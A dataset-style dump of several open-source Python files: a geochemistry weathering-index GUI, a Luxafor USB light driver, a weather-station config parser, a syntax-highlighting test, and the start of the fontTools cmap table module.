text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
from ImportDependence import *
from CustomClass import *
class CIA(AppForm):
useddf=pd.DataFrame()
Lines = []
Tags = []
description = 'Chemical Index of Alteration'
unuseful = ['Name',
'Mineral',
'Author',
'DataType',
'Label',
'Marker',
'Color',
'Size',
'Alpha',
'Style',
'Width',
'Tag']
reference = '''
CIA = [Al2O3/(Al2O3+CaO*+Na2O+K2O]×100
ICV = (Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995)
PIA = {(Al2O3-K2O)/[(Al2O3-K2O)+CaO*+Na2O]}×100
CIW = [Al2O3/(Al2O3+CaO*+Na2O)]×100
CIW' = [Al2O3/(Al2O3+Na2O)]×100
where CaO* is the amount of CaO incorporated in the silicate fraction of the rock.
CaO* = CaO - (10/3 * P2O5)
if CaO* < Na2O:
CaO* = CaO*
else:
CaO* = Na2O
References:
Nesbitt-CIA-1982
Harnois-CIW-1988
Mclennan-CIA-1993
Cox R-ICV-1995
Fedo-PIA-1995
Cullers-CIW'-2000
Song B W-2013
Cox R, Lowe D R, Cullers R L. The influence of sediment recycling and basement composition on evolution of mudrock chemistry in the southwestern United States[J]. Geochimica Et Cosmochimica Acta, 1995, 59(14):2919-2940.
Harnois, L., 1988, The CIW index: A new chemical index of weathering: Sedimentary Geology, v. 55, p. 319–322. doi:10.1016/0037-0738(88)90137-6
Nesbitt, H.W., and Young, G.M., 1982, Early Proterozoic climates and plate motions inferred from major element chemistry of lutites: Nature, v. 299, p. 715–717. doi:10.1038/299715a0
'''
BaseMass = {'SiO2': 60.083,
'TiO2': 79.865,
'Al2O3': 101.960077,
'TFe2O3': 159.687,
'Fe2O3': 159.687,
'TFeO': 71.844,
'FeO': 71.844,
'MnO': 70.937044,
'MgO': 40.304,
'CaO': 56.077000000000005,
'Na2O': 61.978538560000004,
'K2O': 94.1956,
'P2O5': 141.942523996,
'CO2': 44.009,
'SO3': 80.057,
'FeO': 71.844,
'Fe3O4': 231.531,
'BaO': 153.326,
'SrO': 103.619,
'Cr2O3': 151.98919999999998,
}
def __init__(self, parent=None, df=pd.DataFrame()):
QMainWindow.__init__(self, parent)
self.setWindowTitle('Chemical Index of Alteration & Index of Compositional Variability')
self.items = []
self._df = df
self._df.reindex()
if (len(df) > 0):
self._changed = True
# print('DataFrame recieved to CIA')
self.raw = df
self.raw = self.CleanDataFile(df)
self.rawitems = self.raw.columns.values.tolist()
for i in self.rawitems:
if i not in self.unuseful:
self.items.append(i)
else:
pass
self.create_main_frame()
self.create_status_bar()
def create_main_frame(self):
self.resize(800,600)
self.main_frame = QWidget()
self.dpi = 128
self.setWindowTitle('Chemical Index of Alteration & Index of Compositional Variability')
self.tableView = CustomQTableView(self.main_frame)
self.tableView.setObjectName('tableView')
self.tableView.setSortingEnabled(True)
self.textbox = GrowingTextEdit(self)
self.textbox.setText(self.reference)
# Other GUI controls
self.save_button = QPushButton('&Save')
self.save_button.clicked.connect(self.saveDataFile)
#
# Layout with box sizers
#
self.hbox = QHBoxLayout()
for w in [self.save_button]:
self.hbox.addWidget(w)
self.hbox.setAlignment(w, Qt.AlignVCenter)
self.vbox = QVBoxLayout()
self.vbox.addWidget(self.tableView)
#self.vbox.addWidget(self.tableView)
self.vbox.addLayout(self.hbox)
self.vbox.addWidget(self.textbox)
self.main_frame.setLayout(self.vbox)
self.setCentralWidget(self.main_frame)
def Read(self, inpoints):
points = []
for i in inpoints:
points.append(i.split())
result = []
for i in points:
for l in range(len(i)):
a = float((i[l].split(','))[0])
a = a * self.x_scale
b = float((i[l].split(','))[1])
b = (self.height_load - b) * self.y_scale
result.append((a, b))
return (result)
def CIA(self):
self.WholeData = []
dataframe=pd.DataFrame()
dataframe = self._df
#dataframe.set_index('Label')
ItemsAvalibale = dataframe.columns.values.tolist()
Indexes = dataframe.index.values.tolist()
#ItemsToCheck = ['Label','SiO2','Al2O3','Fe2O3','MgO','CaO','Na2O','K2O','P2O5','MnO','TiO2']
ItemsToTest = ['Number', 'Tag', 'Name', 'Author', 'DataType', 'Marker', 'Color', 'Size', 'Alpha',
'Style', 'Width']
for i in ItemsAvalibale:
if 'O' not in i and i !='Label':
dataframe = dataframe.drop(i, 1)
WholeItemsAvalibale = dataframe.columns.values.tolist()
ItemsAvalibale = dataframe.columns.values.tolist()
Indexes = dataframe.index.values.tolist()
if 'Whole' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('Whole')
if 'CIA' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('CIA')
if 'ICV' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('ICV')
if 'PIA' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('PIA')
if 'CIW' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('CIW')
if 'CIW\'' not in WholeItemsAvalibale:
WholeItemsAvalibale.append('CIW\'')
print('index',Indexes,'\ncolums',WholeItemsAvalibale)
WholeMole=[]
WholeList=[]
dataframe = dataframe.dropna(axis=1,how='all')
print(dataframe)
for j in Indexes:
tmpList=[]
tmpMoleSum=0
tmpcia=0
tmpAl2O3=0
tmpCaO=0
tmpNa2O=0
tmpK2O=0
tmpP2O5=0
tmpFe2O3=0
tmpMgO=0
tmpMnO=0
tmpTiO2=0
#ICV =(Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995)
for i in ItemsAvalibale:
if i in self.BaseMass:
m=dataframe.at[j,i]
n=self.BaseMass[i]
#print('\nm & n is \t',m,n)
tmpmole= m/n
#print(tmpmole)
tmpMoleSum = tmpMoleSum + tmpmole
#tmpList.append(dataframe.at[i,j])
#print('\n total mole is',tmpMoleSum)
for i in ItemsAvalibale:
if i in self.BaseMass:
tmpdata= 100*(dataframe.at[j,i]/self.BaseMass[i])/tmpMoleSum
tmpList.append(tmpdata)
#print(i, tmpdata)
if i =='Al2O3':
tmpAl2O3=tmpdata
elif i =='CaO':
tmpCaO=tmpdata
elif i =='Na2O':
tmpNa2O = tmpdata
elif i =='K2O':
tmpK2O=tmpdata
elif i =='P2O5':
tmpP2O5=tmpdata
elif i =='Fe2O3':
tmpFe2O3=tmpdata
elif i == 'MgO':
tmpMgO = tmpdata
elif i == 'MnO':
tmpMnO = tmpdata
elif i == 'TiO2':
tmpTiO2 = tmpdata
elif i == 'Label' :
tmpdata = dataframe.at[j,i]
tmpList.append(tmpdata)
elif i in WholeItemsAvalibale:
del WholeItemsAvalibale[WholeItemsAvalibale.index(i)]
tmpList.append(tmpMoleSum)
usedCaO=0
middleCaO= tmpCaO-(10/3.0*tmpP2O5)
if middleCaO< tmpNa2O:
usedCaO=middleCaO
else:
usedCaO=tmpNa2O
#print(tmpAl2O3, usedCaO, tmpK2O, tmpNa2O)
CIA=tmpAl2O3/(tmpAl2O3+usedCaO+tmpNa2O+tmpK2O)*100
tmpList.append(CIA)
ICV =(tmpFe2O3+tmpK2O+tmpNa2O+usedCaO+tmpMgO+tmpMnO+tmpTiO2)/tmpAl2O3 #(Cox,1995)
tmpList.append(ICV)
PIA = ((tmpAl2O3-tmpK2O)/(tmpAl2O3-tmpK2O+usedCaO+tmpNa2O))*100
tmpList.append(PIA)
CIW = (tmpAl2O3/(tmpAl2O3+usedCaO+tmpNa2O))*100
tmpList.append(CIW)
CIW2 = (tmpAl2O3/(tmpAl2O3+tmpNa2O))*100
tmpList.append(CIW2)
'''
CIA = [Al2O3/(Al2O3+CaO*+Na2O+K2O]×100
ICV = (Fe2O3+K2O+Na2O+CaO*+MgO+MnO+TiO2)/Al2O3 (Cox,1995)
PIA = {(Al2O3-K2O)/[(Al2O3-K2O)+CaO*+Na2O]}×100
CIW = [Al2O3/(Al2O3+CaO*+Na2O)]×100
CIW' = [Al2O3/(Al2O3+Na2O)]×100
'''
#print(len(tmpList))
WholeList.append(tmpList)
pass
print(len(WholeList))
print(len(WholeItemsAvalibale))
df = pd.DataFrame(WholeList,columns=WholeItemsAvalibale)
self.useddf = df
self.tableView.setModel(PandasModel(self.useddf))
self.show()
def saveDataFile(self):
# if self.model._changed == True:
# print('changed')
# print(self.model._df)
DataFileOutput, ok2 = QFileDialog.getSaveFileName(self,
'文件保存',
'C:/',
'Excel Files (*.xlsx);;CSV Files (*.csv)') # 数据文件保存输出
if (DataFileOutput != ''):
if ('csv' in DataFileOutput):
self.useddf.to_csv(DataFileOutput, sep=',', encoding='utf-8')
elif ('xls' in DataFileOutput):
self.useddf.to_excel(DataFileOutput, encoding='utf-8')
|
chinageology/GeoPython
|
geopytool/CIA.py
|
Python
|
gpl-3.0
| 10,636 | 0.010566 |
# -*- coding: utf-8 -*-
import usb
class LuxaforFlag(object):
DEVICE_VENDOR_ID = 0x04d8
DEVICE_PRODUCT_ID = 0xf372
MODE_STATIC_COLOUR = 1
MODE_FADE_COLOUR = 2
MODE_STROBE = 3
MODE_WAVE = 4
MODE_PATTERN = 6
LED_TAB_1 = 1
LED_TAB_2 = 2
LED_TAB_3 = 3
LED_BACK_1 = 4
LED_BACK_2 = 5
LED_BACK_3 = 6
LED_TAB_SIDE = 65
LED_BACK_SIDE = 66
LED_ALL = 255
WAVE_SINGLE_SMALL = 1
WAVE_SINGLE_LARGE = 2
WAVE_DOUBLE_SMALL = 3
WAVE_DOUBLE_LARGE = 4
PATTERN_LUXAFOR = 1
PATTERN_RANDOM1 = 2
PATTERN_RANDOM2 = 3
PATTERN_RANDOM3 = 4
PATTERN_POLICE = 5
PATTERN_RANDOM4 = 6
PATTERN_RANDOM5 = 7
PATTERN_RAINBOWWAVE = 8
def __init__(self):
self.device = None
def get_device(self):
"""
Retrieve a PyUSB device for the Luxafor Flag.
Will lazy load the device as necessary.
"""
if not self.device:
self.device = self.find_device()
self.setup_device(self.device)
return self.device
def setup_device(self, device):
"""
Performs initialisation on the device.
"""
try:
# Gets around "Resource busy" errors
device.detach_kernel_driver(0)
except Exception as e:
pass
device.set_configuration()
def find_device(self):
"""
Attempts to retrieve the Luxafor Flag device using the known Vendor
and Product IDs.
"""
device = usb.core.find(
idVendor=LuxaforFlag.DEVICE_VENDOR_ID,
idProduct=LuxaforFlag.DEVICE_PRODUCT_ID
)
return device
def write(self, values):
"""
Send values to the device.
Expects the values to be a List of command byte codes. Refer to
the individual commands for more information on the specific command
codes.
"""
self.get_device().write(1, values)
# Sometimes the flag simply ignores the command. Unknown if this
# is an issue with PyUSB or the flag itself. But sending the
# command again works a treat.
self.get_device().write(1, values)
def create_static_colour_command(self, led, r, g, b):
return [LuxaforFlag.MODE_STATIC_COLOUR, led, r, g, b]
def create_fade_colour_command(self, led, r, g, b, duration=20):
return [LuxaforFlag.MODE_FADE_COLOUR, led, r, g, b, duration]
def create_strobe_command(self, led, r, g, b, duration=20, repeat=2):
return [LuxaforFlag.MODE_STROBE, led, r, g, b, duration, 0, repeat]
def create_wave_command(self, wave_type, r, g, b, duration=20, repeat=1):
return [
LuxaforFlag.MODE_WAVE, wave_type, r, g, b, duration, 0, repeat
]
def create_pattern_command(self, pattern_id, repeat=1):
return [LuxaforFlag.MODE_PATTERN, pattern_id, repeat]
def off(self):
"""
Turn off all LEDs.
"""
self.do_static_colour(255, 0, 0, 0)
def do_static_colour(self, leds, r, g, b):
"""
Set a single LED or multiple LEDs immediately to the specified colour.
"""
self._do_multi_led_command(
self.create_static_colour_command, leds, r, g, b
)
def do_fade_colour(self, leds, r, g, b, duration):
"""
Fade a single LED or multiple LEDs from their current colour to a new
colour for the supplied duration.
"""
self._do_multi_led_command(
self.create_fade_colour_command, leds, r, g, b, duration
)
def do_strobe(self, led, r, g, b, duration, repeat):
"""
Flash the specified LED a specific colour, giving the duration of each
flash and the number of times to repeat.
Unfortunately this command does not support multiple specific LEDs.
"""
command = self.create_strobe_command(led, r, g, b, duration, repeat)
self.write(command)
def do_wave(self, wave_type, r, g, b, duration, repeat):
"""
Animate the flag with a wave pattern of the given type, using the
specified colour, duration and number of times to repeat.
"""
command = self.create_wave_command(
wave_type, r, g, b, duration, repeat
)
self.write(command)
def do_pattern(self, pattern, repeat):
"""
Execute a built in pattern a given number of times.
"""
command = self.create_pattern_command(pattern, repeat)
self.write(command)
def _do_multi_led_command(
self, create_command_function, leds, *args, **kwargs
):
try:
iter(leds)
except TypeError:
command = create_command_function(leds, *args, **kwargs)
self.write(command)
else:
for led in leds:
command = create_command_function(led, *args, **kwargs)
self.write(command)
|
takeontom/pyluxafor
|
pyluxafor/pyluxafor.py
|
Python
|
mit
| 4,987 | 0 |
#!/usr/bin/python
## This driver is based is based on reverse engineering of HeavyWeather 2800 v 1.54
## All copyright goes to La Crosse Technology (c) 2008
## Python port by Eddi De Pieri <eddi@depieri.net>
## Use this software as your own risk.
## Me and La Crosse Technology is not responsable for any damage using this software
from configobj import ConfigObj
import logging
import USBHardware
USBHardware = USBHardware.USBHardware()
class CWeatherStationConfig(object):
def __init__(self):
self.logger = logging.getLogger('ws28xx.CWeatherStationConfig')
filename= "/etc/WV5Datastore.cfg"
config = ConfigObj(filename)
config.filename = filename
try:
self._CheckSumm = int(config['ws28xx']['CheckSumm'])
except:
self._CheckSumm = 0
self._ClockMode = 0
self._TemperatureFormat = 0
self._PressureFormat = 0
self._RainFormat = 0
self._WindspeedFormat = 0
self._WeatherThreshold = 0
self._StormThreshold = 0
self._LCDContrast = 0
self._LowBatFlags = 0
self._ResetMinMaxFlags = 0
self._HistoryInterval = 0
def readAlertFlags(self,buf):
print "CWeatherStationConfig::readAlertFlags"
def GetResetMinMaxFlags(self):
print "CWeatherStationConfig::GetResetMinMaxFlags"
def CWeatherStationConfig_buf(self,buf,start):
newbuf=[0]
newbuf[0] = buf[0]
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&this->_AlarmTempIndoor);
#v4 = 0;
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&thisa->_AlarmTempOutdoor);
#LOBYTE(v4) = 1;
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&thisa->_AlarmHumidityOutdoor);
#LOBYTE(v4) = 2;
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&thisa->_AlarmHumidityIndoor);
#LOBYTE(v4) = 3;
#CWeatherStationWindAlarm::CWeatherStationWindAlarm(&thisa->_AlarmGust);
#LOBYTE(v4) = 4;
#CWeatherStationHighLowAlarm::CWeatherStationHighLowAlarm(&thisa->_AlarmPressure);
#LOBYTE(v4) = 5;
#CWeatherStationHighAlarm::CWeatherStationHighAlarm(&thisa->_AlarmRain24H);
#LOBYTE(v4) = 6;
#CWeatherStationWindDirectionAlarm::CWeatherStationWindDirectionAlarm(&thisa->_AlarmWindDirection);
#LOBYTE(v4) = 7;
#std::bitset<23>::bitset<23>(&thisa->_ResetMinMaxFlags);
self.read(newbuf,start);
def GetCheckSum(self):
self.logger.debug("")
self.CalcCheckSumm()
return self._CheckSumm
def CalcCheckSumm(self):
self.logger.debug("")
t = [0]
t[0] = [0]*1024
#self._ = self.write(t);
#print "CWeatherStationConfig._CheckSumm (should be retrieved) --> 0x%x" % self._CheckSumm
def read(self,buf,start):
self.logger.debug("wsconfig")
nbuf=[0]
nbuf[0]=buf[0]
#print "read",nbuf[0]
CheckSumm = nbuf[0][43+start] | (nbuf[0][42+start] << 8);
self._CheckSumm = CheckSumm;
CheckSumm -= 7;
self._ClockMode = nbuf[0][0+start] & 1;
self._TemperatureFormat = (nbuf[0][0+start] >> 1) & 1;
self._PressureFormat = (nbuf[0][0+start] >> 2) & 1;
self._RainFormat = (nbuf[0][0+start] >> 3) & 1;
self._WindspeedFormat = (nbuf[0][0+start] >> 4) & 0xF;
self._WeatherThreshold = nbuf[0][1+start] & 0xF;
self._StormThreshold = (nbuf[0][1+start] >> 4) & 0xF;
self._LCDContrast = nbuf[0][2+start] & 0xF;
self._LowBatFlags = (nbuf[0][2+start] >> 4) & 0xF;
USBHardware.ReverseByteOrder(nbuf,3+start, 4)
#buf=nbuf[0]
#CWeatherStationConfig::readAlertFlags(thisa, buf + 3+start);
USBHardware.ReverseByteOrder(nbuf, 7+start, 5);
#v2 = USBHardware.ToTemperature(nbuf, 7+start, 1);
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmTempIndoor, v2);
#v3 = USBHardware.ToTemperature(nbuf + 9+start, 0);
#self._AlarmTempIndoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmTempIndoor,
# LODWORD(v3));
#j___RTC_CheckEsp(v4);
USBHardware.ReverseByteOrder(nbuf, 12+start, 5);
#v5 = USBHardware.ToTemperature(nbuf, 12+start, 1);
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmTempOutdoor, v5);
#v6 = USBHardware.ToTemperature(nbuf, 14+start, 0);
#self._AlarmTempOutdoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmTempOutdoor,
# LODWORD(v6));
USBHardware.ReverseByteOrder(nbuf, 17+start, 2);
#v8 = USBHardware.ToHumidity(nbuf, 17+start, 1);
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmHumidityIndoor, v8);
#v9 = USBHardware.ToHumidity(nbuf, 18+start, 1);
#self._AlarmHumidityIndoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmHumidityIndoor,
# LODWORD(v9));
USBHardware.ReverseByteOrder(nbuf, 19+start, 2);
#v11 = USBHardware.ToHumidity(nbuf, 19+start, 1);
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmHumidityOutdoor, v11);
#v12 = USBHardware.ToHumidity(nbuf, 20+start, 1);
#self._AlarmHumidityOutdoor.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmHumidityOutdoor,
# LODWORD(v12));
USBHardware.ReverseByteOrder(nbuf, 21+start, 4);
#v14 = USBHardware.To4Pre3Post(nbuf, 21+start);
#self._AlarmRain24H.baseclass_0.vfptr[2].__vecDelDtor((CWeatherStationAlarm *)&self._AlarmRain24H, LODWORD(v14));
self._HistoryInterval = nbuf[0][25+start] & 0xF;
#USBHardware.ReverseByteOrder(nbuf, 26+start, 3u);
##v16 = USBHardware._ToWindspeed(nbuf, 26+start);
#CWeatherStationWindAlarm::SetHighAlarmRaw(&self._AlarmGust, v16);
#USBHardware.ReverseByteOrder(nbuf, 29+start, 5u);
#USBHardware.ReadPressureShared(nbuf, 29+start, &a, &b);
#v17 = Conversions::ToInhg(a);
#v25 = b - v17;
#if ( fabs(v25) > 1.0 )
#{
# Conversions::ToInhg(a);
# v18 = CTracer::Instance();
# CTracer::WriteTrace(v18, 30, "low pressure alarm difference: %f");
#}
#CWeatherStationHighLowAlarm::SetLowAlarm(&self._AlarmPressure, a);
USBHardware.ReverseByteOrder(nbuf, 34+start, 5);
#USBHardware.ReadPressureShared(nbuf, 34+start, &a, &b);
#v19 = Conversions::ToInhg(a);
#v25 = b - v19;
#if ( fabs(v25) > 1.0 )
#{
# Conversions::ToInhg(a);
# v20 = CTracer::Instance();
# CTracer::WriteTrace(v20, 30, "high pressure alarm difference: %f");
#}
#self._AlarmPressure.baseclass_0.baseclass_0.vfptr[2].__vecDelDtor(
# (CWeatherStationAlarm *)&self._AlarmPressure,
# LODWORD(a));
t = nbuf[0][39+start];
t <<= 8;
t |= nbuf[0][40+start];
t <<= 8;
t |= nbuf[0][41+start];
#std::bitset<23>::bitset<23>((std::bitset<23> *)&v26, t);
#self._ResetMinMaxFlags._Array[0] = v22;
#for ( i = 0; i < 0x27; ++i )
for i in xrange(0, 38):
CheckSumm -= nbuf[0][i+start];
#if ( CheckSumm ): for now is better to comment it
#self._CheckSumm = -1;
filename= "/etc/WV5Datastore.cfg"
config = ConfigObj(filename)
config.filename = filename
config['ws28xx'] = {}
config['ws28xx']['CheckSumm'] = str(self._CheckSumm)
config['ws28xx']['ClockMode'] = str(self._ClockMode)
config['ws28xx']['TemperatureFormat'] = str(self._TemperatureFormat)
config['ws28xx']['PressureFormat'] = str(self._PressureFormat)
config['ws28xx']['RainFormat'] = str(self._RainFormat)
config['ws28xx']['WindspeedFormat'] = str(self._WindspeedFormat)
config['ws28xx']['WeatherThreshold'] = str(self._WeatherThreshold)
config['ws28xx']['StormThreshold'] = str(self._StormThreshold)
config['ws28xx']['LCDContrast'] = str(self._LCDContrast)
config['ws28xx']['LowBatFlags'] = str(self._LowBatFlags)
config['ws28xx']['HistoryInterval'] = str(self._HistoryInterval)
config.write()
return 1;
def write(self,buf):
self.logger.debug("")
new_buf = [0]
new_buf[0]=buf[0]
CheckSumm = 7;
new_buf[0][0] = 16 * (self._WindspeedFormat & 0xF) + 8 * (self._RainFormat & 1) + 4 * (self._PressureFormat & 1) + 2 * (self._TemperatureFormat & 1) + self._ClockMode & 1;
new_buf[0][1] = self._WeatherThreshold & 0xF | 16 * self._StormThreshold & 0xF0;
new_buf[0][2] = self._LCDContrast & 0xF | 16 * self._LowBatFlags & 0xF0;
#CWeatherStationConfig::writeAlertFlags(nbuf, 3);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmTempIndoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmTempIndoor);
#v25 = v2;
#v24 = CWeatherTraits.TemperatureOffset() + v2;
#v21 = v24;
#v22 = CWeatherTraits.TemperatureOffset() + CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmTempIndoor);
#v4 = v22;
#USBHardware::ToTempAlarmBytes(nbuf, 7, v22, v21);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmTempOutdoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmTempOutdoor);
#v25 = v4;
#v24 = CWeatherTraits.TemperatureOffset() + v4;
#v21 = v24;
#v22 = CWeatherTraits.TemperatureOffset() + CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmTempOutdoor);
#v6 = v22;
#USBHardware::ToTempAlarmBytes(nbuf, 12, v22, v21);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmHumidityIndoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmHumidityIndoor);
#v21 = v6;
#v8 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmHumidityIndoor);
#v9 = v8;
#USBHardware::ToHumidityAlarmBytes(nbuf, 17, v9, v21);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmHumidityOutdoor.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmHumidityOutdoor);
#v21 = v8;
#v11 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmHumidityOutdoor);
#v12 = v11;
#USBHardware::ToHumidityAlarmBytes(nbuf, 19, v12, v21);
#((void (__thiscall *)(CWeatherStationHighAlarm *))thisa->_AlarmRain24H.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmRain24H);
#v21 = v11;
#USBHardware::ToRainAlarmBytes(nbuf, 21, v21);
new_buf[0][25] = self._HistoryInterval & 0xF;
#v21 = CWeatherStationWindAlarm::GetHighAlarmRaw(&thisa->_AlarmGust);
#USBHardware::_ToWindspeedAlarmBytes(nbuf, 26, v21);
#v21 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure);
#v21 = Conversions::ToInhg(v21);
#v14 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure);
#v15 = CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure);
#USBHardware::ToPressureBytesShared(nbuf, 29, v15, v21);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmPressure.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmPressure);
#((void (__thiscall *)(CWeatherStationHighLowAlarm *))thisa->_AlarmPressure.baseclass_0.baseclass_0.vfptr[1].__vecDelDtor)(&thisa->_AlarmPressure);
#USBHardware::ToPressureBytesShared(nbuf, 34, Conversions::ToInhg(CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure)), Conversions::ToInhg(CWeatherStationHighLowAlarm::GetLowAlarm(&thisa->_AlarmPressure)))
#print "debugxxx ", type(self._ResetMinMaxFlags)
new_buf[0][39] = (self._ResetMinMaxFlags >> 0) & 0xFF;
new_buf[0][40] = (self._ResetMinMaxFlags >> 8) & 0xFF; #BYTE1(self._ResetMinMaxFlags);
new_buf[0][41] = (self._ResetMinMaxFlags >> 16) & 0xFF;
#for ( i = 0; i < 39; ++i )
for i in xrange(0, 38):
CheckSumm += new_buf[0][i];
new_buf[0][42] = (CheckSumm >> 8) & 0xFF #BYTE1(CheckSumm);
new_buf[0][43] = (CheckSumm >> 0) & 0xFF #CheckSumm;
buf[0] = new_buf[0]
return CheckSumm
|
dpeddi/ws-28xx
|
CWeatherStationConfig.py
|
Python
|
gpl-3.0
| 11,102 | 0.037651 |
from....import a
from...import b
from..import c
from.import d
from : keyword.control.import.python, source.python
.... : punctuation.separator.period.python, source.python
import : keyword.control.import.python, source.python
: source.python
a : source.python
from : keyword.control.import.python, source.python
... : punctuation.separator.period.python, source.python
import : keyword.control.import.python, source.python
: source.python
b : source.python
from : keyword.control.import.python, source.python
.. : punctuation.separator.period.python, source.python
import : keyword.control.import.python, source.python
: source.python
c : source.python
from : keyword.control.import.python, source.python
. : punctuation.separator.period.python, source.python
import : keyword.control.import.python, source.python
: source.python
d : source.python
|
MagicStack/MagicPython
|
test/statements/import3.py
|
Python
|
mit
| 1,061 | 0.042413 |
from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools.misc.textTools import safeEval, readHex
from fontTools.ttLib import getSearchRange
from fontTools.unicode import Unicode
from . import DefaultTable
import sys
import struct
import array
import operator
class table__c_m_a_p(DefaultTable.DefaultTable):
def getcmap(self, platformID, platEncID):
for subtable in self.tables:
if (subtable.platformID == platformID and
subtable.platEncID == platEncID):
return subtable
return None # not found
def decompile(self, data, ttFont):
tableVersion, numSubTables = struct.unpack(">HH", data[:4])
self.tableVersion = int(tableVersion)
self.tables = tables = []
seenOffsets = {}
for i in range(numSubTables):
platformID, platEncID, offset = struct.unpack(
">HHl", data[4+i*8:4+(i+1)*8])
platformID, platEncID = int(platformID), int(platEncID)
format, length = struct.unpack(">HH", data[offset:offset+4])
if format in [8,10,12,13]:
format, reserved, length = struct.unpack(">HHL", data[offset:offset+8])
elif format in [14]:
format, length = struct.unpack(">HL", data[offset:offset+6])
if not length:
print("Error: cmap subtable is reported as having zero length: platformID %s, platEncID %s, format %s offset %s. Skipping table." % (platformID, platEncID,format, offset))
continue
if format not in cmap_classes:
table = cmap_format_unknown(format)
else:
table = cmap_classes[format](format)
table.platformID = platformID
table.platEncID = platEncID
# Note that by default we decompile only the subtable header info;
# any other data gets decompiled only when an attribute of the
# subtable is referenced.
table.decompileHeader(data[offset:offset+int(length)], ttFont)
if offset in seenOffsets:
table.cmap = tables[seenOffsets[offset]].cmap
else:
seenOffsets[offset] = i
tables.append(table)
def compile(self, ttFont):
self.tables.sort() # sort according to the spec; see CmapSubtable.__lt__()
numSubTables = len(self.tables)
totalOffset = 4 + 8 * numSubTables
data = struct.pack(">HH", self.tableVersion, numSubTables)
tableData = b""
seen = {} # Some tables are the same object reference. Don't compile them twice.
done = {} # Some tables are different objects, but compile to the same data chunk
for table in self.tables:
try:
offset = seen[id(table.cmap)]
except KeyError:
chunk = table.compile(ttFont)
if chunk in done:
offset = done[chunk]
else:
offset = seen[id(table.cmap)] = done[chunk] = totalOffset + len(tableData)
tableData = tableData + chunk
data = data + struct.pack(">HHl", table.platformID, table.platEncID, offset)
return data + tableData
def toXML(self, writer, ttFont):
writer.simpletag("tableVersion", version=self.tableVersion)
writer.newline()
for table in self.tables:
table.toXML(writer, ttFont)
def fromXML(self, name, attrs, content, ttFont):
if name == "tableVersion":
self.tableVersion = safeEval(attrs["version"])
return
if name[:12] != "cmap_format_":
return
if not hasattr(self, "tables"):
self.tables = []
format = safeEval(name[12:])
if format not in cmap_classes:
table = cmap_format_unknown(format)
else:
table = cmap_classes[format](format)
table.platformID = safeEval(attrs["platformID"])
table.platEncID = safeEval(attrs["platEncID"])
table.fromXML(name, attrs, content, ttFont)
self.tables.append(table)
class CmapSubtable(object):
def __init__(self, format):
self.format = format
self.data = None
self.ttFont = None
def __getattr__(self, attr):
# allow lazy decompilation of subtables.
if attr[:2] == '__': # don't handle requests for member functions like '__lt__'
raise AttributeError(attr)
if self.data is None:
raise AttributeError(attr)
self.decompile(None, None) # use saved data.
self.data = None # Once this table has been decompiled, make sure we don't
# just return the original data. Also avoids recursion when
# called with an attribute that the cmap subtable doesn't have.
return getattr(self, attr)
def decompileHeader(self, data, ttFont):
format, length, language = struct.unpack(">HHH", data[:6])
assert len(data) == length, "corrupt cmap table format %d (data length: %d, header length: %d)" % (format, len(data), length)
self.format = int(format)
self.length = int(length)
self.language = int(language)
self.data = data[6:]
self.ttFont = ttFont
def toXML(self, writer, ttFont):
writer.begintag(self.__class__.__name__, [
("platformID", self.platformID),
("platEncID", self.platEncID),
("language", self.language),
])
writer.newline()
codes = sorted(self.cmap.items())
self._writeCodes(codes, writer)
writer.endtag(self.__class__.__name__)
writer.newline()
def isUnicode(self):
return (self.platformID == 0 or
(self.platformID == 3 and self.platEncID in [1, 10]))
def isSymbol(self):
return self.platformID == 3 and self.platEncID == 0
